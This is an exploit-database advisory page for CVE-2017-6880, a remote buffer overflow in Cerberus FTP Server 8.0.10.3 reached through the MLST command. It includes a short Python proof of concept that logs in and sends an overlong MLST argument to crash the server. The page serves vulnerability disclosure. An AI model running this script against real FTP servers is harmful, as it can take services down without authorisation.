Lucene search
Nassim AsrirEXPLOITPACK:069C0DE3BF636F433C448A3191EEA598HistoryMar 16, 2017 - 12:00 a.m.
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)
2017-03-1600:00:00
Nassim Asrir
13
0.042 Low
EPSS
Percentile
92.3%
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880
Vendor:
===============
https://www.cerberusftp.com/
Download:
===========
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
Vulnerability Type:
===================
Remote Buffer Overflow.
issue:
===================
This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
import socket
bad_char = "A"*2047
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.81',21))
s.recv(1024)
s.send('USER nassim\r\n')
s.recv(1024)
s.send('PASS mypass\r\n')
s.recv(1024)
s.send('MLST ' + bad_char + '\r\n')
s.close()
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
Tested on:
===============
Windows 7 Sp1 (64 Bit)Related
nvd
nvd
CVE-2017-6880
2017-03-17 17:59:00
zdt
zdt
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow Vulnerability
2017-03-17 00:00:00
prion
prion
Buffer overflow
2017-03-17 17:59:00
cvelist
cvelist
CVE-2017-6880
2017-03-17 17:00:00
cve
cve
CVE-2017-6880
2017-03-17 17:59:00
packetstorm
packetstorm
Cerberus FTP 8.0.10.3 MLST Buffer Overflow
2017-05-15 00:00:00
exploitdb
exploitdb
Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)
2017-03-16 00:00:00